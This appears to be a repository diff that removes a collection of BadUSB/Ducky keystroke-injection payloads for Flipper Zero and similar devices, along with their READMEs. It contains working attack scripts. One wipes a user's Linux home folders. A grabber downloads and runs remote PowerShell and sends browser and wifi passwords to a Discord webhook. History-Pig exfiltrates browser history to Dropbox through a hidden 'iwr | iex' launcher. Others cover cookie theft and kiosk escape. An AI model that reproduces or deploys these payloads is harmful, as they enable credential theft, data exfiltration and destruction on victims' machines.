REM Author: FLIZZ3R
REM TITLE: OPEN_WRECKER
REM *** CAUTION *** This is a destructive payload. KNOW WHAT YOU'RE DOING BEFORE RUNNING.
REM OBJECTIVE: Wipe open linux machine directories then create dummy directories and sorry text file
REM ** Added Reboot for shutdown :< shutdown -h now>: ***
DELAY 500
WINDOWS d
DELAY 300
CTRL-ALT t
DELAY 1500
STRING rm -r Desktop Downloads Pictures #snap Documents Music Public Templates +++'VirtualBox VMs'
ENTER
DELAY 1500
STRING mkdir Deskop downloadz Pics Dox ++Music Public TEMPS Vms
ENTER
DELAY 500
STRING cd Deskop
ENTER
DELAY 500
STRING touch sosorry.txt
ENTER
ALT F4
DELAY 100
CTRL-ALT t
DELAY 1000
STRING reboot
ENTER
REM :::FLIZZ3R@DISCORD)))

16
badusb/Get-Connected-USBs.txt
View file

@ -1,16 +0,0 @@
REM Title: Get-Connected-USBs
REM Author: atomicsec
REM Source: https://github.com/atomiczsec/Get-Connected-USBs
REM Generator: https://github.com/I-Am-Jakoby/Powershell-to-Ducky-Converter
REM Target OS: Windows 10
REM Description: Payload gets all connected USB devices
REM
DELAY 2000
GUI r
DELAY 2000
STRING powershell
DELAY 250
ENTER
DELAY 2000
STRING Get-PnpDevice -PresentOnly | Where-Object { $_.InstanceId -match '^USB' } | Out-File -FilePath .\USB-Connected.txt
ENTER

55
badusb/GoodUSB.txt
View file

@ -1,55 +0,0 @@
GUI r
DELAY 1000
STRING notepad.exe
ENTER
DELAY 1000
STRING Greetings!
ENTER
STRING You've just launched GoodUSB!
ENTER
ENTER
STRING This script will take the following actions:
ENTER
STRING 1) Download ClamAV
ENTER
STRING 2) Update ClamAV to the latest malware definitions.
ENTER
STRING 3) Scan your system memory for any malicious processes.
ENTER
STRING 4) If any are found, TERMINATE THEM!
ENTER
ENTER
STRING This process may take a very long time, about 30 minutes to an hour.
ENTER
STRING You can abort now by unplugging this device.
ENTER
STRING Otherwise, the process will begin in 5...
DELAY 3000
STRING 4...
DELAY 3000
STRING 3...
DELAY 3000
STRING 2...
DELAY 3000
STRING 1...
DELAY 3000
STRING 0
ENTER
STRING Away we go!
DELAY 2000
ALT F4
DELAY 1000
ALT N
GUI r
DELAY 1000
STRING powershell.exe
ENTER
DELAY 1000
STRING Start-Process powershell -Verb runAs ; exit
ENTER
DELAY 4000
LEFT
ENTER
DELAY 4000
STRING mkdir $env:USERPROFILE\AppData\Local\Temp ; cd $env:USERPROFILE\AppData\Local\Temp ; Invoke-WebRequest -Uri https://www.clamav.net/downloads/production/clamav-0.105.0.win.x64.zip -OutFile clam.zip ; Expand-Archive -Force clam.zip ; del clam.zip ; cd clam\* ; mv .\conf_examples\freshclam.conf.sample freshclam.conf ; mv .\conf_examples\clamd.conf.sample clamd.conf ; Set-Content -Path "freshclam.conf" -Value (get-content -Path "freshclam.conf" | Select-String -Pattern 'Example' -NotMatch) ; Set-Content -Path "clamd.conf" -Value (get-content -Path "clamd.conf" | Select-String -Pattern 'Example' -NotMatch) ; Start-Process -Wait .\freshclam.exe ; Start-Process -NoNewWindow -Wait .\clamscan.exe "--memory --kill" ; cd $env:USERPROFILE\AppData\Local\Temp ; rmdir -R clam
ENTER

48
badusb/Grabber-Discord_Webhook.txt
View file

@ -1,48 +0,0 @@
REM Title: Ultimate Flipper Grabber
REM Author: blobs0 (https://github.com/blobs0/Ultimate-Flipper-Grabber)
REM Credit Discord webhooks functions :I-am-jakoby
REM Credit Wifi grabber : 7h30th3r0n3 and the0bone
REM Credit Password Nirsoft : moosehadley
REM Target: Windows 10/11 (7/8 not tested)
REM Supported Layout keyboard: US/FR/DE
REM Version: 1.1
REM Category: Grabber
REM Extrait l'antivirus, les mots de passe wifi et de navigateur vers un webhook discord.
DELAY 2000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 1000
REM edit your webhook here
STRING $DiscordUrl = 'Your-Discord-Webhook'
ENTER
STRING iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/blobs0/Ultimate-Flipper-Grabber/main/payload.ps1'))
ENTER
DELAY 500
STRING version-av
ENTER
STRING Wifi
ENTER
STRING Get-Nirsoft
ENTER
DELAY 5000
STRING wbpv28821@
ENTER
STRING .\WebBrowserPassView.exe
ENTER
DELAY 3000
CTRL A
CTRL S
DELAY 1000
STRING c:\temp\export.txt
ENTER
DELAY 1000
ALT F4
DELAY 800
STRING Upload-Discord -file "C:\temp\export.txt" -text "Browser password :"
ENTER
STRING Del-Nirsoft-File
ENTER
STRING EXIT
ENTER

78
badusb/Hacker_Typer.txt
View file

@ -1,78 +0,0 @@
REM Opens a harmless website and types like a hacker
REM By UberGuidoZ
REM
DELAY 1500
GUI r
DELAY 1000
STRING http://geektyper.com/plain
DELAY 50
ENTER
DELAY 2000
F11
DELAY 500
STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop
DELAY 500
STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop
DELAY 500
STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop
DELAY 1500
RIGHTARROW
DELAY 1500
LEFTARROW
DELAY 1500
STRING 3
DELAY 1500
SHIFT
DELAY 1500
STRING 1
DELAY 1500
STRING 6
DELAY 1500
STRING 4
DELAY 1500
STRING 2
DELAY 1500
STRING 5
DELAY 1500
STRING 7
DELAY 1500
STRING 9
DELAY 1500
STRING 8
DELAY 5000
BACKSPACE
DELAY 500
STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop
DELAY 500
STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop
DELAY 500
STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop
DELAY 500
STRING 0
DELAY 500
STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop
DELAY 500
STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop
DELAY 500
STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop
DELAY 500
STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop
DELAY 500
STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop
DELAY 500
STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop
UPARROW
DELAY 500
STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop
DELAY 500
STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop
DELAY 500
STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop
DELAY 500
STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop
DELAY 500
STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop
DELAY 500
STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop
DELAY 5000
ALT F4

17
badusb/Hey_Everybody.txt
View file

@ -1,17 +0,0 @@
REM Author: UberGuidoZ
REM Description: Turns up the volume then speaks.
REM Originally designed for an OMG cable, change the text in the last line to suit.
DELAY 2000
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1000
STRING $key=[Math]::Ceiling(100/2);$obj=New-Object -ComObject WScript.Shell;for($i=0;$i -lt $key;$i++){$obj.SendKeys([char] 175)}
ENTER
DELAY 250
STRING $sp=New-Object -ComObject SAPI.SpVoice
ENTER
DELAY 250
STRING $sp.Speak("Hey everybody! I plugged in something I should not have.")
ENTER

63
badusb/History-Pig/HP.ps1
View file

@ -1,63 +0,0 @@
#History-Pig
# See if file is a thing
Test-Path -Path "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -PathType Leaf)) {
try {
Write-Host "The Chrome History file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Chrome History to Temp Directory to get sent to Dropbox
else {
$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_history"
Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -Destination "$env:tmp/$F1"
}
# See if file is a thing
Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf)) {
try {
Write-Host "The Edge History file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Edge History to Temp Directory to get sent to Dropbox
else {
$F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_history"
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -Destination "$env:tmp/$F2"
}
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "ADD-YOUR-DROPBOX-TOKEN-HERE" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
DropBox-Upload -f "$env:tmp/$F1"
DropBox-Upload -f "$env:tmp/$F2"
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)

109
badusb/History-Pig/README.md
View file

@ -1,109 +0,0 @@
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;History+Pig!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# History-Pig
A payload to exfiltrate the history of the 2 most popular browsers
## Description
This payload will enumerate through the browser directories, looking for the file that stores the history
These files will be saved to the temp directory
Finally dropbox will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>

16
badusb/History-Pig/payload.txt
View file

@ -1,16 +0,0 @@
REM Title: History-Pig
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate browsers history to a dropbox
REM Target: Windows 10, 11
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1

17
badusb/Honk.txt
View file

@ -1,17 +0,0 @@
REM Title: Desktop Goose
REM Author: FalsePhilosopher
REM Target: Windows 10+
REM Props: Hak5, https://samperson.itch.io/desktop-goose for the honks,Jakoby for some PS bits I used from ADV-Rickroll https://github.com/I-Am-Jakoby, 3ctOs for the PS bits I used https://github.com/3ct0s/badusb-download-execute-disable-windows-defender and memes
REM Version: 1.0
REM Category: Prank
REM Downloads and lets loose THE GOOSE!He'll nab your mouse, track mud on your screen... leave you a message, deliver you memes?
REM
REM startup delay
DELAY 300
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 2000
STRING powershell -w h ($Z="$env:TMP"+'\dg.zip');$D="$env:TMP"+'\dg';curl https://github.com/UberGuidoZ/FalsePhilosopher-BadUSB-Playground/raw/89f0c34e05fbf9926d6524b154d9d7be99763665/Ducky/USBRubberducky/library/prank/Win/Desktop_Goose/dg.zip -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;$file="$env:TMP"+'\dg\GooseDesktop.exe';$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
ENTER

29
badusb/InfoSecREDD_Payloads/C2-Data-Exfil-Discord.txt
View file

File diff suppressed because one or more lines are too long

473
badusb/Kiosk-Evasion-Bruteforce.txt
View file

@ -1,473 +0,0 @@
REM KIOSK EVASION EXPERIEMENTAL PAYLOADS
REM Target: Windows
REM Stop this script when evasion is succeed
REM and run your true payload
REM optimised for Flipper Zero
REM Auth: @nocomp
REM Source: https://github.com/nocomp/Kiosk-evasion-BADUsb-Bruteforce
DELAY 2000
ALT F4
DELAY 700
ALT SPACE
DELAY 700
ALT TAB
DELAY 700
CTRL B
DELAY 700
CTRL ALT DEL
DELAY 700
CTRL ESC
DELAY 700
CTRL F4
DELAY 700
CTRL P
DELAY 700
CTRL SHIFT ESC
DELAY 700
CTRL TAB
DELAY 700
CTRL GUI F
DELAY 700
F1
DELAY 500
F3
DELAY 500
SHIFT
SHIFT
SHIFT
SHIFT
SHIFT
DELAY 700
GUI BREAK
DELAY 500
GUI d
DELAY 700
GUI e
DELAY 700
GUI F1
DELAY 700
GUI r
DELAY 700
GUI t
DELAY 700
GUI u
DELAY 700
GUI p
DELAY 700
GUI c
DELAY 700
GUI v
DELAY 700
GUI k
DELAY 700
GUI a
DELAY 700
GUI SPACEBAR
DELAY 700
GUI a
DELAY 700
GUI b
DELAY 700
GUI c
DELAY 700
GUI d
DELAY 700
GUI e
DELAY 700
GUI f
DELAY 700
GUI g
DELAY 700
GUI h
DELAY 700
GUI i
DELAY 700
GUI j
DELAY 700
GUI k
DELAY 700
GUI m
DELAY 700
GUI n
DELAY 700
GUI o
DELAY 700
GUI p
DELAY 700
GUI q
DELAY 700
GUI r
DELAY 700
GUI s
DELAY 700
GUI t
DELAY 700
GUI u
DELAY 700
GUI v
DELAY 700
GUI w
DELAY 700
GUI x
DELAY 700
GUI y
DELAY 700
GUI z
DELAY 700
CTRL a
DELAY 700
CTRL b
DELAY 700
CTRL c
DELAY 700
CTRL d
DELAY 700
CTRL e
DELAY 700
CTRL f
DELAY 700
CTRL g
DELAY 700
CTRL h
DELAY 700
CTRL i
DELAY 700
CTRL j
DELAY 700
CTRL k
DELAY 700
CTRL l
DELAY 700
CTRL m
DELAY 700
CTRL n
DELAY 700
CTRL o
DELAY 700
CTRL p
DELAY 700
CTRL q
DELAY 700
CTRL r
DELAY 700
CTRL s
DELAY 700
CTRL t
DELAY 700
CTRL u
DELAY 700
CTRL v
DELAY 700
CTRL w
DELAY 700
CTRL x
DELAY 700
CTRL y
DELAY 700
CTRL z
DELAY 700
REM TASK MANAGER
DELAY 500
CTRL SHIFT ESC
DELAY 500
REM HIDDEN ADMIN MENU
DELAY 500
CTRL ALT F8
DELAY 500
CTRL ESC F9
REM MOUSE KEYS
DELAY 500
SHIFT ALT NUMLOCK
DELAY 500
REM CONTEXT MENU
DELAY 500
SHIFT F10
DELAY 500
F1
DELAY 500
GUI r
ALTSTRING shell:Administrative Tools
ENTER
DELAY 500
GUI r
ALTSTRING shell:DocumentsLibrary
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:Libraries
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:UserProfiles
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:Personal
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:SearchHomeFolder
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:NetworkPlacesFolder
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:SendTo
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:UserProfiles
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:Common Administrative Tools
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:MyComputerFolder
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:InternetFolder
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING Shell:Profile
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING Shell:ProgramFiles
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING Shell:System
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING Shell:ControlPanelFolder
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING Shell:Windows
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:::{21EC2020 3AEA 1069 A2DD 08002B30309D}
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:::{20D04FE0 3AEA 1069 A2D8 08002B30309D}
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:::{{208D2C60 3AEA 1069 A2D7 08002B30309D}}
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:::{871C5380 42A0 1069 A2EA 08002B30309D}
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING file:///C:/Kiosk/HTML/index.html
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING file:///C:/Users/KioskRestricted
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING File:/C:/windows
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING File:/C:\windows\
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING File:/C:\windows/
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING File:/C:/windows
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING File://C:/windows
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING File://C:\windows/
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING file://C:\windows
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING C:/windows
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING C:\windows\
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING C:\windows
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING C:/windows/
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING C:/windows\
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING %WINDIR%
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING %TMP%
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING %TEMP%
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING %SYSTEMDRIVE%
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING %SYSTEMROOT%
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING %APPDATA%
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING %HOMEDRIVE%
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING %HOMESHARE%
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING Callto://
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING Gopher://
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING DHCP://
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING Telnet://
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING TN3270://
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING Rlogin://
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING LDAP://
DELAY 500
GUI r
DELAY 500
ALTSTRING News://
DELAY 500
GUI r
DELAY 500
ALTSTRING Mailto://
DELAY 500
GUI r
DELAY 500
ALTSTRING MMS://
DELAY 500
GUI r
DELAY 500
ALTSTRING SKYPE://
DELAY 500
GUI r
DELAY 500
ALTSTRING SIP://
DELAY 500
GUI r
DELAY 500
ALTSTRING Play://
DELAY 500
GUI r
DELAY 500
ALTSTRING Steam://
DELAY 500
GUI r
DELAY 500
ALTSTRING Quicktime://
DELAY 500
GUI r
DELAY 500
ALTSTRING smb://
DELAY 500
GUI r
DELAY 500
ALTSTRING ftp://

1230
badusb/Kuronons_FZ_Win.txt
View file

File diff suppressed because it is too large Load diff

88
badusb/MacOS-narstybits/Executions Readme.md
View file

@ -1,88 +0,0 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="dedicated to penetration testing and security assessments using Ducky scripts. It provides information, resources, and tools related to executing security tests and evaluating system vulnerabilities.">
<meta name="author" content="NarstyBits flipperzero badusb payloads">
<!-- Open Graph tags -->
<meta property="og:title" content="MacOS-DuckyScripts">
<meta property="og:description" content="BadUSB scripts exclusively designed for Mac OS & the Flipper Zero device.">
<meta property="og:image" content="https://imgur.com/MfuJBOZ.png">
<meta property="og:url" content="https://github.com/narstybits/MacOS-DuckyScripts/blob/main/Executions%20Readme.md">
<meta charset="utf-8>
</head>
<body>
[![Image Description](https://imgur.com/MfuJBOZ.png)](https://github.com/narstybits/MacOS-DuckyScripts/tree/main/Executions)
<div align="left">
<img alt="Coding" width="1473" height="18" src="https://media.giphy.com/media/9JxkPTP3alOykb8PmQ/giphy.gif">
</div>
<h3 align="center">
<p>Welcome to the Executions Folder!</p>
<h>The <a href="https://github.com/narstybits/MacOS-DuckyScripts/tree/main/Executions">Executions Folder</a> is dedicated to penetration testing and security assessments using Ducky scripts. It provides information, resources, and tools related to executing security tests and evaluating system vulnerabilities.</p>
</h4>
<h2> Introduction
<div align="center">
<img alt="Coding" width="1473" height="5" src="https://media.giphy.com/media/RH27Uw1IFGfIs/giphy.gif">
</div>
<h4>Penetration testing, also known as ethical hacking, is a process of evaluating the security of a system or network by simulating real-world attacks. This section aims to guide you through the process of executing security tests using Ducky scripts.</p>
<h2>Types of Executions
<div align="center">
<img alt="Coding" width="1473" height="5" src="https://media.giphy.com/media/RH27Uw1IFGfIs/giphy.gif">
</div>
<h4>
<copy>
<ol>
<li>Load Testing: This tests how well a system can handle heavy traffic or data processing. It helps find weak points in the system's performance.</li>
<li>Data Exfiltration to Dropbox or iPhone: This involves taking data from a target system and uploading it to a Dropbox account or sending it to an iPhone. This can be used to steal information or disrupt the target's operations.</li>
<li>Personal Information Gathering: This involves finding personal details about a target. These details can be used to gain unauthorized access to systems or for identity theft.</li>
<li>Remote Shell: This involves gaining control of a target system's command line from a remote location. This allows an attacker to execute commands and manipulate the system without being physically present.</li>
<li>System Disruption: This involves causing problems for a target system, like making it unavailable or causing it to malfunction.</li>
<li>System Destruction: This is a severe attack that causes permanent damage to a target system, like deleting important files or damaging hardware.</li>
</ol>
</copy>
</h4>
<h2> Tools
<div align="center">
<img alt="Coding" width="1473" height="5" src="https://media.giphy.com/media/RH27Uw1IFGfIs/giphy.gif">
</div>
<h4>
<ul>
<p>These are just a few examples of tools used for executing security tests. Remember to always use these tools responsibly and in accordance with applicable laws and regulations.</p>
<p><span style="font-size: 0;"></span>🔹<a href="https://ffmpeg.org/">FFmpeg</a>: A powerful multimedia framework for encoding, decoding, transcoding, and streaming audio and video files.</li>
<p><span style="font-size: 0;"></span>🔹<a href="https://cat.pdx.edu/platforms/mac/remote-access/remote-to-mac/">VNC (Virtual Network Computing)</a>: A remote desktop software that allows you to control and access remote systems over a network.</li>
<p><span style="font-size: 0;"></span>🔹<a href="https://linux.die.net/man/1/socat">socat</a>: A versatile network utility that establishes bidirectional data streams between two endpoints, facilitating various network operations.</li>
<p><span style="font-size: 0;"></span>🔹<a href="https://cirt.net/Nikto2">Nikto</a>: A web server scanner that performs comprehensive vulnerability assessments.</li>
<p><span style="font-size: 0;"></span>🔹<a href="https://github.com/OJ/gobuster">Gobuster</a>: A tool used for directory and DNS busting during reconnaissance.</li>
<p><span style="font-size: 0;"></span>🔹<a href="https://nmap.org/">Nmap</a>: A powerful network scanning tool used for port scanning and network mapping.</li>
</ul>
</h5>
<h2> Resources
<div align="center">
<img alt="Coding" width="1473" height="5" src="https://media.giphy.com/media/RH27Uw1IFGfIs/giphy.gif">
</div>
<h3>Here are some additional resources to learn more about penetration testing/executions and Ducky scripting:</p>
<h4>
<ul>
<p><span style="font-size: 0;"></span>🔹<a href="https://www.ducktoolkit.com/">Duck Toolkit</a>: A more comprehensive guide on using Hak5's Rubber Ducky, including how to write and decode Ducky Scripts.</p>
<p><span style="font-size: 0;"></span>🔹<a href="https://www.guru99.com/load-testing-tutorial.html">Guru99's Load Testing Tutorial</a>: An extensive tutorial that covers the principles and practical aspects of load testing, an essential part of assessing the performance and stability of a system under a particular load.</p>
<p><span style="font-size: 0;"></span>🔹<a href="https://www.dropbox.com/developers/documentation/http/documentation">Dropbox API Keys Documentation</a>: Comprehensive developer documentation from Dropbox, including detailed instructions on how to generate and manage API keys for application development.</p>
</ul>
</h4>
<div align="center">
<img alt="Coding" width="1473" height="5" src="https://media.giphy.com/media/RH27Uw1IFGfIs/giphy.gif">
</div>
</body>

21
badusb/MacOS-narstybits/Executions/ Delete Copy Pasta.txt
View file

@ -1,21 +0,0 @@
REM Deletes the hidden folder ~/.copypasta
REM To be used with copy pasta script
REM Author: Narsty
REM Title: Delete Copy Pasta
REM Target: MacOS
REM Version: 1.0
REM Category: Executions
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING rm -rf ~/.copypasta
DELAY 500
ENTER

26
badusb/MacOS-narstybits/Executions/Bluetooth On.txt
View file

@ -1,26 +0,0 @@
REM Title: BLUETOOTH ON
REM Author: NARSTY
REM Description: Opens spotlight, searches for bluetooth file exchange
REM and turns bluetooth on
REM using the Macs built in bluetooth File Exchange
REM Target: MacOS
REM Version: 1.0
REM Category: Execution
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 1000
STRING bluetooth File Exchange
DELAY 1000
ENTER
DELAY 1000
ENTER
DELAY 2000
TAB
DELAY 2000
SPACE
DELAY 1000
GUI W

97
badusb/MacOS-narstybits/Executions/Cookies to Dropbox.txt
View file

@ -1,97 +0,0 @@
REM This Script will copy the Cookies folder and send them to your dropbox API
REM Replace '<SYSTEM USERNAME HERE>' with the systems actual username
REM Replace '<YOUR API KEY HERE>' with your actual Dropbox API key
REM Here's the breakdown, we navigate to the finder
REM use the Shift GUI G to open up the "go to folder" menu.
REM Then we search for & open the library folder.
REM Now we can type "cook" to navigate to the cookies folder
REM we copy it and navigate to a new window to paste the folder
REM Then we zip the folder and send it to the dropbox
REM Using the nohup and & to make sure the code is executed
REM Requirements Must have at least two windows open
REM Dropbox API key and targets system username
REM Author: Narsty
REM Title: Cookies to Dropbox
REM Version 1.0 MacOs
REM Category: Execution
ID 05ac:021e Apple:Keyboard
